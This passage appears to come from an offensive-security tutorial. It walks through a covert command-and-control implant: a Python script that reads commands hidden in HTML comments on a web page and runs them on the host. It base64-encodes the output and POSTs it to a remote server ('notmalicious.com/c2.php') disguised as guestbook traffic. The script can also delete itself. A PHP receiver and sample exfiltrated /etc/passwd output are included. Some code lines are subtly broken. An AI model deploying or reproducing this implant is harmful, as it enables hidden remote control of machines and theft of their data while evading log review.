The issue with brazenly presenting your commands in URLs is that even a half-asleep log analyst will spot it. There are multiple methods of hiding requests, but when you don't know what the response text is going to look like, you need to provide a solid method of disguising the output and returning it to your server.
We will create a script that masks command and control activities as HTTP traffic, takes commands from comments on a web page, and returns the output into a guestbook.
For this, you will need a functioning web server with two pages, one to host your comments and one to host your retrieval page.
Your comment page should just have standard content. For this, I'm using the Nginx default home page and adding comments to it at the end. A comment should be expressed as:
<!--cmdgoeshere-->
The retrieval page can be as simple as:
<?php
$host='localhost';
$username='user';
$password='password';
$db_name="data";
$tbl_name="data";
$comment = $_REQUEST['comment'];
mysql_connect($host, $username, $password) or die("Cannot contact server");
mysql_select_db($db_name)or die("Cannot find DB");
$sql="INSERT INTO $tbl_name VALUES('$comment')";
$result=mysql_query($sql);
mysql_close();
?>Basically, what this PHP does is take an incoming value in the POST request named comment and places it in a database. It's very rudimentary and does not distinguish between multiple incoming commands if you have multiple shells going.
The script we will be using is as follows:
import requests
import re
import subprocess
import time
import os
while 1:
req = requests.get("http://127.0.0.1")
comments = re.findall('<!--(.*)-->',req.text)
for comment in comments:
if comment = " ":
os.delete(__file__)
else:
try:
response = subprocess.check_output(comment.split())
except:
response = "command fail"
data={"comment":(''.join(response)).encode("base64")}
newreq = requests.post("http://notmalicious.com/c2.php", data=data)
time.sleep(30)The following shows an example of the output produced when using this script:
Name: TGludXggY2FtLWxhcHRvcCAzLjEzLjAtNDYtZ2VuZXJpYyAjNzktVWJ1bnR1IFNNU CBUdWUgTWFyIDEwIDIwOjA2OjUwIFVUQyAyMDE1IHg4Nl82NCB4ODZfNjQgeDg2X zY0IEdOVS9MaW51eAo= Comment: Name: cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFl bW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9i aW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jp bi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5 bmM6L2JpbjovYmluL3N5bmMKZ Comment:
As ever, we import the necessary libraries and get the script going:
import requests import re import subprocess import time import os
As this script has a built-in self deletion method, we can set it up to run forever with the following loop:
while 1:
We make a request to check whether there are any comments on our preconfigured page. If there are, we put them in a list. We use very basic regex to perform this check:
req = requests.get("http://127.0.0.1")
comments = re.findall('<!--(.*)-->',req.text)The first thing we do is check for an empty comment. This signifies to the script that it should delete itself, a very important mechanism for hands-off C2 scripts. If you wish the script to delete itself, just leave an empty comment on your page. The script deletes itself by looking for its own name and removing that name:
for comment in comments:
if comment = " ":
os.delete(__file__)If the comment isn't blank, we attempt to pass it to the system with the subprocess command. It's important that you use .split() on the command to account for how subprocess handles multi-part commands. We use .check_output to return whatever output the command gives directly to the variable that we assign:
else:
try:
response = subprocess.check_output(comment.split())If the command fails, we set the response value to be command failed:
except:
response = "command fail"We take the response variable and assign it to a key that matches our PHP script in a dictionary. In this circumstance, the field name is comment and thus we assign our output to a comment. We base64 the output in order to account for any random variables, such as spaces or code that may interfere with our script:
data={"comment":(''.join(response)).encode("base64")}Now the data has been assigned, we send it in a POST request to our preconfigured server and wait 30 seconds to again check for further instructions in the comments:
newreq = requests.post("http://127.0.0.1/addguestbook.php", data=data)
time.sleep(30)